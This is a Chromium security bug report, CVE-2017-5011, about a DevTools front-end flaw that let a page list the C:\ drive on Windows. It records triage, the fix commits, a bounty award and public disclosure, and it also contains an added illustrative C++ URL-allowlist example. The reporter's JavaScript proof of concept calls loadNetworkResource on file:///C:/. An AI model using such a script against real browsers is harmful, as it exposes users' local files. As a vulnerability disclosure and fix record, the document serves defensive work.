Issue 662859 Security: chrome-devtools protocol allows to read the content of C:\ drive
Reported by chromium...@gmail.com, Nov 7 2016
Status: Verified
Closed: Jan 2
OS: Windows
Pri: 1
Type: Bug-Security
VERSION
Chrome Version: 56.0.2912.0
Operating System: Win7

REPRODUCTION CASE
1. Navigate to chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html
2. Navigate to the link below in chrome-dev.txt (on the same tab)
3. Observe

Demo Attack Script [pre-encoding]:

function f() {c='d="",DevToolsAPI.streamWrite=function(e,o){d+=o},DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0],function(e){d.split("\\n").map(function(e){e.match(/addRow.*;/)&&document.write(e.match(/addRow.*;/)[0]);})});' ;document.write("<script>window.document.write('<script>'+c+'</scr'+'ipt>');</scr"+"ipt>");}if( typeof DevToolsHost == "undefined" ) location.reload();else f();

 
Attachments: chrome-dev.txt (1.7 KB), Recording.mp4 (838 KB)
Components: Platform>DevTools
Looks very similar to 653134; I'm not sure how it differs?
Yeah, but in this report I used the first step to repro.
Labels: Security_Severity-High M-56 OS-Windows
Owner: dgozman@chromium.org
Status: Assigned
Does this repro on stable or canary only? (I don't have a windows machine handy to check.)
I couldn't repro this on 54.0.2840.87 (stable).
Labels: Security_Impact-Head
Project Member Comment 6 by sheriffbot@chromium.org, Nov 8 2016
Labels: ReleaseBlock-Beta
This issue is a security regression. If you are not able to fix this quickly, please revert the change that introduced it.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 7 by sheriffbot@chromium.org, Nov 8 2016
Labels: Pri-1
Comment 8 Deleted
Any updates on this bug? thanks.
Project Member Comment 10 by sheriffbot@chromium.org, Nov 21 2016
dgozman: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Dgozman@ Could you please take a look at this issue? - Thanks :).
Project Member Comment 12 by sheriffbot@chromium.org, Dec 2 2016
Labels: -Security_Impact-Head Security_Impact-Beta
Project Member Comment 13 by sheriffbot@chromium.org, Dec 5 2016
dgozman: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -ReleaseBlock-Beta -Security_Impact-Beta ReleaseBlock-Stable Security_Impact-Stable
Impact stable per #8
This bug seems to have been forgotten.
Cc: caseq@chromium.org
Comment 17 by caseq@chromium.org, Dec 28 2016
Cc: -caseq@chromium.org dgozman@chromium.org
Owner: caseq@chromium.org
Status: Started
Note this is not a recent regression -- I've been able to reproduce this on m55 (stable) as well.
Project Member Comment 18 by bugdroid1@chromium.org, Dec 29 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/eea3300239f0b53e172a320eb8de59d0bea65f27

commit eea3300239f0b53e172a320eb8de59d0bea65f27
Author: caseq <caseq@chromium.org>
Date: Thu Dec 29 02:19:18 2016

DevTools: move front-end URL handling to DevToolsUIBindings

BUG=662859

Review-Url: https://codereview.chromium.org/2607833002
Cr-Commit-Position: refs/heads/master@{#440926}

[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/test/BUILD.gn

Verified on 57.0.2969.1 (Canary). Fixed.
Status: Verified
Labels: reward-topanel
Project Member Comment 22 by sheriffbot@chromium.org, Jan 3
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Project Member Comment 23 by sheriffbot@chromium.org, Jan 5
Labels: Merge-Request-56
Project Member Comment 24 by sheriffbot@chromium.org, Jan 5
Labels: -Merge-Request-56 Hotlist-Merge-Approved Merge-Approved-56
Your change meets the bar and is auto-approved for M56. Please go ahead and merge the CL manually. Please contact milestone owner if you have questions.
Owners: amineer@(clank), cmasso@(bling), gkihumba@(cros), bustamante@(desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Cc: pfeldman@chromium.org
Project Member Comment 26 by bugdroid1@chromium.org, Jan 11
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/714ce74842af647ab192124910b08a07ee7d606b

commit 714ce74842af647ab192124910b08a07ee7d606b
Author: caseq <caseq@chromium.org>
Date: Wed Jan 11 01:31:09 2017

Revert of DevTools: move front-end URL handling to DevToolsUIBindings (patchset #2 id:40001 of https://codereview.chromium.org/2607833002/ )

Reason for revert:
A better fix is coming, reverting this one to make it a part of the new fix so that one CL may be merged onto a branch.

Original issue's description:
> DevTools: move front-end URL handling to DevToolsUIBindings
>
> BUG=662859
>
> Committed: https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27
> Cr-Commit-Position: refs/heads/master@{#440926}

TBR=dgozman@chromium.org
# Not skipping CQ checks because original CL landed more than 1 day ago.
BUG=662859

Review-Url: https://codereview.chromium.org/2620193002
Cr-Commit-Position: refs/heads/master@{#442758}

[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_ui_bindings.h
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_window.cc
[delete] https://crrev.com/451daad4f60a3ca0f7508097309d11a15da480fe/chrome/browser/devtools/url_constants.cc
[delete] https://crrev.com/451daad4f60a3ca0f7508097309d11a15da480fe/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui.h
[rename] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/test/BUILD.gn

Project Member Comment 27 by bugdroid1@chromium.org, Jan 11
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/c2db881506f5709433a5bf6ed981b1bc0c860598

commit c2db881506f5709433a5bf6ed981b1bc0c860598
Author: caseq <caseq@chromium.org>
Date: Wed Jan 11 03:39:32 2017

Fix front-end host creation upon navigation

- when navigating, add host bindings to the pending frame rather than old frame;
- force renderer swap if front-end URL is invalid;
- move front-end URL validation to DevToolsUIBindings

This also re-lands https://codereview.chromium.org/2607833002

BUG=662859, 678035

Review-Url: https://codereview.chromium.org/2620153002
Cr-Commit-Position: refs/heads/master@{#442781}

[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/chrome_web_ui_controller_factory.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/test/BUILD.gn
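The fix above moves front-end URL validation into DevToolsUIBindings and forces a renderer swap when the front-end URL is invalid, so host bindings such as loadNetworkResource are never exposed to a page that is not a legitimate DevTools front end. The following is an added example and not Chromium's code: a stand-alone C++ allowlist gate of the kind that decision needs. The two accepted URL forms (the remote/serve_rev/@<rev>/ form from the repro case, and a bundled/ form assumed here), the character rules for the path, and the names IsValidFrontendURL, IsSafeRelativePath and DecideForNavigation are all assumptions made for illustration; the real check lives in devtools_ui_bindings.cc and is not reproduced here.

```cpp
#include <cctype>
#include <cstddef>
#include <iostream>
#include <string>

// Added example, not Chromium's code. Models the kind of allowlist gate that
// should run before a DevTools front-end page receives host bindings.

static bool StartsWith(const std::string& s, const std::string& prefix) {
  return s.size() >= prefix.size() && s.compare(0, prefix.size(), prefix) == 0;
}

// Accepts only a conservative character set for the part of the URL after the
// allowlisted prefix, so the embedder cannot be steered at another resource.
static bool IsSafeRelativePath(const std::string& path) {
  if (path.empty()) return false;
  if (path.find("..") != std::string::npos) return false;
  for (char c : path) {
    unsigned char uc = static_cast<unsigned char>(c);
    if (std::isalnum(uc) || c == '/' || c == '.' || c == '_' || c == '-') continue;
    return false;
  }
  return true;
}

// Hypothetical validator: true only for the two assumed front-end URL forms.
bool IsValidFrontendURL(const std::string& url) {
  static const std::string kBundled = "chrome-devtools://devtools/bundled/";
  static const std::string kRemote = "chrome-devtools://devtools/remote/serve_rev/@";

  if (StartsWith(url, kBundled))
    return IsSafeRelativePath(url.substr(kBundled.size()));

  if (StartsWith(url, kRemote)) {
    const std::string rest = url.substr(kRemote.size());
    const std::size_t slash = rest.find('/');
    if (slash == std::string::npos || slash == 0) return false;
    // The revision token is treated as an opaque alphanumeric identifier
    // such as 199588 (assumption).
    for (std::size_t i = 0; i < slash; ++i) {
      if (!std::isalnum(static_cast<unsigned char>(rest[i]))) return false;
    }
    return IsSafeRelativePath(rest.substr(slash + 1));
  }

  // file:, http(s): and every other scheme, as well as any other
  // chrome-devtools:// path, are rejected.
  return false;
}

// Decision the embedder would make on a navigation of the front-end frame:
// attach bindings to the pending frame only when its URL passes the gate,
// otherwise swap renderers and attach nothing (modelled on the commit text).
enum class NavigationDecision { kAttachBindings, kSwapRendererWithoutBindings };

NavigationDecision DecideForNavigation(const std::string& pending_url) {
  return IsValidFrontendURL(pending_url)
             ? NavigationDecision::kAttachBindings
             : NavigationDecision::kSwapRendererWithoutBindings;
}

int main() {
  // Constructed inputs: the repro URL from the report, a file: URL like the
  // one the demo script hands to loadNetworkResource, and some variants.
  const char* samples[] = {
      "chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html",
      "chrome-devtools://devtools/bundled/devtools.html",
      "file:///C:/",
      "chrome-devtools://devtools/remote/serve_rev/@199588/../devtools.html",
      "https://example.invalid/devtools.html",
  };
  for (const char* s : samples) {
    std::cout << (IsValidFrontendURL(s) ? "allow  " : "reject ") << s << "\n";
  }
  return 0;
}
```

The point of the gate is its position, not its exact grammar: it must run on the URL of the pending navigation, before any binding is handed to the frame, which is exactly the ordering the fix commit describes.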

Labels: -reward-topanel reward-3000 reward-unpaid
Greetings!  The panel took a look at this and decided to reward $3,000!  Please note that's only because this bug can be triggered from an untrusted extension. The amount of user interaction required in the bug as reported would have made it unlikely to receive a reward.
Thanks Andrew! :)
Hi caseq@ - mind doing the merge to M56?
Labels: -reward-unpaid reward-inprocess
Project Member Comment 32 by bugdroid1@chromium.org, Jan 24
Labels: -merge-approved-56 merge-merged-2924
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/d6f1c251f409263302a2df863df61314418dc4b2

commit d6f1c251f409263302a2df863df61314418dc4b2
Author: Andrey Kosyakov <caseq@chromium.org>
Date: Tue Jan 24 03:21:21 2017

Fix front-end host creation upon navigation

- when navigating, add host bindings to the pending frame rather than old frame;
- force renderer swap if front-end URL is invalid;
- move front-end URL validation to DevToolsUIBindings

This also re-lands https://codereview.chromium.org/2607833002

BUG=662859, 678035

Review-Url: https://codereview.chromium.org/2620153002
Cr-Commit-Position: refs/heads/master@{#442781}
(cherry picked from commit c2db881506f5709433a5bf6ed981b1bc0c860598)

Review-Url: https://codereview.chromium.org/2653783003
Cr-Commit-Position: refs/branch-heads/2924@{#853}
Cr-Branched-From: 3a87aecc31cd1ffe751dd72c04e5a96a1fc8108a-refs/heads/master@{#433059}

[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/chrome_web_ui_controller_factory.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/test/BUILD.gn

Labels: Release-0-M56
Labels: -ReleaseBlock-Stable
Labels: CVE-2017-5011
Project Member Comment 36 by sheriffbot@chromium.org, Apr 11
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot